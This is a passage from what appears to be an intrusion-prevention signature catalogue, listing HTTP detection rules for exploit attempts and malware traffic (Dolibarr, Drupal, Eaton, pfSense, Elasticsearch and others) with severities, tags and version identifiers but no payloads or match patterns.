Last changed: sgpkg-ips-1758-5242
Vulnerability: Dolibarr-ERP-And-CRM-Card.php-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Dolibarr-ERP-And-CRM-Database-Backup-Command-Injection

About this situation: An attempt to exploit a vulnerability in Dolibarr ERP and CRM Suite detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Dolibarr, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1641-5242
Last changed: sgpkg-ips-1641-5242
Vulnerability: Dolibarr-ERP-And-CRM-Database-Backup-Command-Injection
Description:
Back to top

HTTP_CRL-Dolibarr-ERP-And-CRM-Edit.php-Code-Injection

About this situation: An attempt to exploit a vulnerability in Dolibarr ERP and CRM Suite detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Dolibarr, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1525-5242
Last changed: sgpkg-ips-1526-5242
Vulnerability: Dolibarr-ERP-And-CRM-Edit.php-Code-Injection
Description:
Back to top

HTTP_CRL-Dolibarr-ERP-And-CRM-Suite-Menu-Editor-Dol_Eval-Code-Injection

About this situation: An attempt to exploit a vulnerability in Dolibarr ERP and CRM Suite detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Dolibarr, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1446-5242
Last changed: sgpkg-ips-1612-5242
Vulnerability: Dolibarr-ERP-And-CRM-Suite-Menu-Editor-Dol_Eval-Code-Injection
Description:
Back to top

HTTP_CRL-Dolibarr-ERP-And-CRM-Suite-Website-Command-Injection

About this situation: An attempt to exploit a vulnerability in Dolibarr ERP and CRM Suite detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Dolibarr, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1412-5242
Last changed: sgpkg-ips-1498-5242
Vulnerability: Dolibarr-ERP-And-CRM-Suite-Website-Command-Injection
Description:
Back to top

HTTP_CRL-Dolibarr-ERP-CRM-Command-Injection

About this situation: An attempt to exploit a Dolibarr ERP CRM Command Injection vulnerability detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, Dolibarr, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-803-5242
Last changed: sgpkg-ips-1272-5242
Vulnerability: Dolibarr-ERP-CRM-Command-Injection
Description:
Back to top

HTTP_CRL-Dolibarr-ERP-Group-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Dolibarr ERP and CRM Suite detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Dolibarr, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1412-5242
Last changed: sgpkg-ips-1412-5242
Vulnerability: Dolibarr-ERP-Group-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Donbot-Bot-Activity-Detected

About this situation: Donbot Bot activity detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Donbot-Bot
Description:
Back to top

HTTP_CRL-Downloader-Malware-Infection-Traffic

About this situation: Downloader malware infection traffic detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1310-5242
Last changed: sgpkg-ips-1314-5242
Vulnerability: Downloader-Malware-Infection-Traffic
Description:
Back to top

HTTP_CRL-DrayTek-Vigor-Web-Management-Page-keyPath-Command-Injection

About this situation: A vulnerability in DrayTek Vigor
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, DrayTek Vigor, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1292-5242
Last changed: sgpkg-ips-1292-5242
Vulnerability: DrayTek-Vigor-Web-Management-Page-keyPath-Command-Injection
Description:
Back to top

HTTP_CRL-Drupal-Core-Database-Expandarguments-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Drupal Drupal detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Drupal, CVE2014, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-613-5211
Vulnerability: Drupal-Core-Database-Expandarguments-SQL-Injection
Description:
Back to top

HTTP_CRL-Drupal-Core-Database-Expandarguments-SQL-Injection-2

About this situation: An attempt to exploit a vulnerability in Drupal Drupal detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Drupal, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-1326-5242
Vulnerability: Drupal-Core-Database-Expandarguments-SQL-Injection
Description:
Back to top

HTTP_CRL-Drupal-Core-Database-Expandarguments-SQL-Injection-3

About this situation: An attempt to exploit a vulnerability in Drupal Drupal detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Drupal, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-614-5211
Vulnerability: Drupal-Core-Database-Expandarguments-SQL-Injection
Description:
Back to top

HTTP_CRL-Drupal-Core-Form-Rendering-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Drupal Drupal detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Drupal, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1059-5242
Last changed: sgpkg-ips-1792-5242
Vulnerability: Drupal-Core-Form-Rendering-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Drupal-Core-Form-Rendering-Remote-Code-Execution-2

About this situation: An attempt to exploit a vulnerability in Drupal detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Drupal, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1064-5242
Last changed: sgpkg-ips-1064-5242
Vulnerability: Drupal-Core-Form-Rendering-Remote-Code-Execution-2
Description:
Back to top

HTTP_CRL-Drupal-Core-Phar-Stream-Wrapper-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Drupal Core detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Drupal, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1147-5242
Last changed: sgpkg-ips-1147-5242
Vulnerability: Drupal-Core-Phar-Stream-Wrapper-Insecure-Deserialization
Description:
Back to top

HTTP_CRL-Drupal-Core-System.Temporary-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Drupal Drupal detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Drupal, CVE2016, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-809-5242
Last changed: sgpkg-ips-809-5242
Vulnerability: Drupal-Core-System.Temporary-Information-Disclosure
Description:
Back to top

HTTP_CRL-Drupal-Core-Web-Services-Remote-Code-Execution-CVE-2019-6340

About this situation: An attempt to exploit a vulnerability in Drupal Core detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Drupal, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1142-5242
Last changed: sgpkg-ips-1866-5242
Vulnerability: Drupal-Core-Remote-Code-Execution-CVE-2019-6340
Drupal-Core-Web-Services-Remote-Code-Execution-CVE-2019-6340
Description:
Back to top

HTTP_CRL-Drupal-Drupalgeddon-2-Forms-API-Property-Injection

About this situation: A Drupal Drupalgeddon 2 Forms API Property Injection
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, Drupal, CVE2018, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1074-5242
Last changed: sgpkg-ips-1074-5242
Vulnerability: Drupal-Drupalgeddon-2-Forms-API-Property-Injection
Description:
Back to top

HTTP_CRL-Drupalgeddon2-Post-Parameter

About this situation: An attempt to exploit a vulnerability in Drupal detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Drupal, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1066-5242
Last changed: sgpkg-ips-1391-5242
Vulnerability: Drupal-Core-Form-Rendering-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Dsielercha-Trojan

About this situation: Dsielercha trojan infection traffic was detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1373-5242
Vulnerability: Dsielercha-Trojan
Description:
Back to top

HTTP_CRL-Dup-Scout-Enterprise-Login-Buffer-Overflow

About this situation: A Dup Scout Enterprise Login Buffer Overflow vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Dup Scout, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1032-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: Dup-Scout-Enterprise-Login-Buffer-Overflow
Description:
Back to top

HTTP_CRL-e107-Contact-Php-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in E107 contact.php was detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, e107, CVE2010, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-336-4219
Last changed: sgpkg-ips-1013-5242
Vulnerability: Bbcode-e107-Remote-Code-Execution-Vulnerability
Description:
Back to top

HTTP_CRL-e107-Contact-Php-Remote-Code-Execution-2

About this situation: An attempt to exploit a vulnerability in E107 contact.php was detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, e107, CVE2010, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-337-4219
Last changed: sgpkg-ips-1013-5242
Vulnerability: Bbcode-e107-Remote-Code-Execution-Vulnerability
Description:
Back to top

HTTP_CRL-Easy-Chat-Server-User-Registeration-Buffer-Overflow

About this situation: An Easy Chat Server User Registeration Buffer Overflow vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Easy Chat Server, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1016-5242
Last changed: sgpkg-ips-1016-5242
Vulnerability: Easy-Chat-Server-User-Registeration-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Easy-Chat-Server-Username-Buffer-Overflow

About this situation: Buffer overflow vulnerability in Easy Chat Server 1.2 and 2.2
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Easy Chat Server, CVE2004, Windows not specific, Suspected Denial of Service, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-645-5211
Vulnerability: Easy-Chat-Server-Username-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Easydynamicpages-Config-Php-System-Compromise

About this situation: Vulnerable config.php and path variable detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, EasyDynamicPages, CVE2004, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-513-5211
Vulnerability: HTTP-Easydynamicpages-Config-Php-System-Compromise
Description:
Back to top

HTTP_CRL-Eaton-Intelligent-Power-Management-CVE-2021-23282-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Eaton Intelligent Power Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Eaton Intelligent Power Manager, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1470-5242
Last changed: sgpkg-ips-1470-5242
Vulnerability: Eaton-Intelligent-Power-Management-CVE-2021-23282-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Eaton-Intelligent-Power-Management-Meta_Driver_Srv-Savedriverdata-Arbitrary-File-Deletion

About this situation: An attempt to exploit a vulnerability in Eaton Intelligent Power Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Eaton Intelligent Power Manager, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1344-5242
Last changed: sgpkg-ips-1344-5242
Vulnerability: Eaton-Intelligent-Power-Manager-Savedriverdata-Arbitrary-File-Deletion
Description:
Back to top

HTTP_CRL-Eaton-IPM-Removebackground-Removefirmware-Arbitrary-File-Deletion

About this situation: An attempt to exploit a vulnerability in Eaton Intelligent Power Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Eaton Intelligent Power Manager, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1383-5242
Last changed: sgpkg-ips-1383-5242
Vulnerability: Eaton-IPM-Removebackground-Removefirmware-Arbitrary-File-Deletion
Description:
Back to top

HTTP_CRL-Eaton-Network-Shutdown-Module-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Eaton Network Shutdown Module detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Eaton Network Shutdown Module, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Eaton-Network-Shutdown-Module-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-ECart-Index-Cgi-Art-Parameter-Command-Execution

About this situation: E-Cart arbitrary command execution vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, E-Cart, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-25-1210
Last changed: sgpkg-ips-507-5211
Vulnerability: HTTP-ECart-Index-Cgi-Art-Parameter-Command-Execution
Description:
Back to top

HTTP_CRL-Ecava-IntegraXOR-SCADA-Information-Leak

About this situation: An attempt to exploit a vulnerability in Ecava IntegraXOR detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, IntegraXOR, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-610-5211
Vulnerability: Ecava-IntegraXOR-SCADA-Information-Leak
Description:
Back to top

HTTP_CRL-Edimax-IC-7100-IP-Camera-OS-Command-Injection-CVE-2025-1316

About this situation: An attempt to exploit a vulnerability in Edimax IC-7100 IP cameras detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Edimax IP Camera, CVE2025, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1853-5242
Last changed: sgpkg-ips-1853-5242
Vulnerability: Edimax-IC-7100-IP-Camera-OS-Command-Injection-CVE-2025-1316
Description:
Back to top

HTTP_CRL-EFS-Software-Easy-File-Sharing-Web-Server-sendemail.ghp-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in EFS Software Easy File Sharing Web Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, EFS Software Easy File Sharing Web Server, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-944-5242
Last changed: sgpkg-ips-946-5242
Vulnerability: EFS-Software-Easy-File-Sharing-Web-Server-sendemail.ghp-Stack-Buffer-Overflow
Description:
Back to top

HTTP_CRL-EFS-Software-Easy-File-Sharing-Web-Server-Userid-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in EFS Software Easy File Sharing Web Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, EFS Software Easy File Sharing Web Server, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-723-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: EFS-Software-Easy-File-Sharing-Web-Server-Userid-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Ekeoil-Malware-C2-Traffic

About this situation: Ekeoil malware C2 traffic was detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1131-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: Ekeoil-Malware-C2-Traffic
Description:
Back to top

HTTP_CRL-Ektron-CMS-XSLT-Transform-Remote-Code-Execution

About this situation: An attempt to exploit an Ektron CMS XSLT Transform Remote Code Execution vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows 2003 SP2, Any Hardware, Ektron CMS, CVE2012, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-765-5211
Vulnerability: Ektron-CMS-XSLT-Transform-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Elastic-Kibana-Timelion-Prototype-Pollution

About this situation: An attempt to exploit a vulnerability in Elastic Kibana detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, ElasticSearch, CVE2019, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1200-5242
Last changed: sgpkg-ips-1441-5242
Vulnerability: Elastic-Kibana-Timelion-Prototype-Pollution
Description:
Back to top

HTTP_CRL-ElasticSearch-Memory-Disclosure

About this situation: An attempt to exploit a vulnerability in Elasticsearch detected
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Any Operating System, Any Hardware, ElasticSearch, CVE2021, Any Operating System not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-1654-5242
Last changed: sgpkg-ips-1654-5242
Vulnerability: ElasticSearch-Memory-Disclosure
Description:
Back to top

HTTP_CRL-ElasticSearch-Search-Groovy-Sandbox-Bypass

About this situation: An attempt to exploit an ElasticSearch Search Groovy Sandbox Bypass vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ElasticSearch, CVE2015, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-740-5211
Last changed: sgpkg-ips-1554-5242
Vulnerability: ElasticSearch-Search-Groovy-Sandbox-Bypass
Description:
Back to top

HTTP_CRL-Electro-Infection-Traffic

About this situation: Electro infection traffic was detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1358-5242
Last changed: sgpkg-ips-1358-5242
Vulnerability: Electro-Infection-Traffic
Description:
Back to top

HTTP_CRL-Elog-Project-Elog-Show_Uploader_JSON-Null-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in ELOG Project ELOG detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ELOG, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1216-5242
Last changed: sgpkg-ips-1216-5242
Vulnerability: Elog-Project-Elog-Show_Uploader_JSON-Null-Pointer-Dereference
Description:
Back to top

HTTP_CRL-EMC-Cmcne-Inmservlets-Bootfileuploadmoreinfoservlet-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in EMC Connectrix Manager Converged Network Edition detected
Context: HTTP Request URI
Severity: 7
Tags: Any Operating System, Any Hardware, EMC Connectrix Manager, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-563-5211
Last changed: sgpkg-ips-563-5211
Vulnerability: EMC-Cmcne-Inmservlets-Bootfileuploadmoreinfoservlet-Directory-Traversal
Description:
Back to top

HTTP_CRL-Emumail-Cgi-Cross-Site

About this situation: Possible cross-site scripting attempt detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, EMUMail, CVE2002, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-514-5211
Vulnerability: HTTP-Emumail-Cgi-Cross-Site
Description:
Back to top

HTTP_CRL-Enalean-Tuleap-Remote-PHP-Code-Injection-Vulnerability

About this situation: A Enalean Tuleap Remote PHP Code Injection Vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Enalean Tuleap, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Vulnerability: Enalean-Tuleap-Remote-PHP-Code-Injection-Vulnerability
Description:
Back to top

HTTP_CRL-Endian-Firewall-Proxy-Password-Change-Command-Execution

About this situation: An attempt to exploit a vulnerability in Endian Firewall detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Endian Firewall, CVE2015, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-1014-5242
Vulnerability: Endian-Firewall-Proxy-Password-Change-Command-Execution
Description:
Back to top

HTTP_CRL-Enigma2-Webinterface-Remote-Root-File-Disclosure

About this situation: An attempt to exploit a vulnerability in Enigma2 Webinterface detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Enigma2 Webinterface, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1776-5242
Vulnerability: Enigma2-Webinterface-Remote-Root-File-Disclosure
Description:
Back to top

HTTP_CRL-Es-File-Explorer-Open-Port

About this situation: An attempt to exploit a vulnerability in ES File Explorer detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ES File Explorer, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1197-5242
Last changed: sgpkg-ips-1865-5242
Vulnerability: Es-File-Explorer-Open-Port
Description:
Back to top

HTTP_CRL-Esf-Pfsense-Diag_Logs_Filter-Multiple-Cross-Site-Scripting-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Electric Sheep Fencing pfSense detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, PfSense, CVE2015, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-643-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: Esf-Pfsense-Multiple-Cross-Site-Scripting-Vulnerabilities
Description:
Back to top

HTTP_CRL-Esf-Pfsense-Firewall_Shaper-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Electric Sheep Fencing pfSense detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, PfSense, CVE2015, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-643-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: Esf-Pfsense-Multiple-Cross-Site-Scripting-Vulnerabilities
Description:
Back to top

HTTP_CRL-Esf-Pfsense-Services_unbound_acls-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Electric Sheep Fencing pfSense detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, PfSense, CVE2015, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-643-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: Esf-Pfsense-Multiple-Cross-Site-Scripting-Vulnerabilities
Description:
Back to top

HTTP_CRL-Esf-Pfsense-Status_captiveportal-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Electric Sheep Fencing pfSense detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, PfSense, CVE2015, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-639-5211
Last changed: sgpkg-ips-666-5211
Vulnerability: Esf-Pfsense-Multiple-Cross-Site-Scripting-Vulnerabilities
Description:
Back to top

HTTP_CRL-Esf-Pfsense-Status_RRD_Graph_img.php-Command-Injection

About this situation: An attempt to exploit a vulnerability in Electric Sheep Fencing pfSense detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, PfSense, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-760-5211
Last changed: sgpkg-ips-1013-5242
Vulnerability: Esf-Pfsense-Status_RRD_Graph_img.php-Command-Injection
Description:
Back to top

HTTP_CRL-Esf-Pfsense-Webgui-Deletefile-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Electric Sheep Fencing pfSense detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, PfSense, CVE2015, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-644-5211
Last changed: sgpkg-ips-1272-5242
Vulnerability: Esf-Pfsense-Webgui-Deletefile-Directory-Traversal
Description:
Back to top

HTTP_CRL-eTrust-SiteMinder-SQL-Injection-CVE-2005-2204

About this situation: An attempt to exploit a vulnerability in eTrust-SiteMinder detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-685-5211
Description:
Back to top

HTTP_CRL-Excessively-Long-Copy-Request-Argument

About this situation: An excessively long argument field in HTTP copy request detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Sun Java Web Server, CVE2010, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
